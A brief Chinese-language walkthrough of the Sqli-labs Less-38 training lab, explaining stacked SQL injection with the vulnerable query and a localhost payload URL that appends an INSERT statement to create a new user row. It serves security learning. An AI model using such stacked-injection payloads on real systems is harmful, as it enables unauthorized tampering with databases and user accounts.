Sqli-labs Less-38 堆叠注入
学习了关于stacked injection的相关知识,我们在本关可以得到直接的运用。
在执行select时的sql语句为:SELECT * FROM users WHERE id='$id' LIMIT 0,1
可以直接构造如下的payload:
http://127.0.0.1/sql/Less-38/index.php?id=1';insert into users(id,username,password) values ('38','less38','hello')--+
再看数据表中的内容:可以看到less38已经添加。
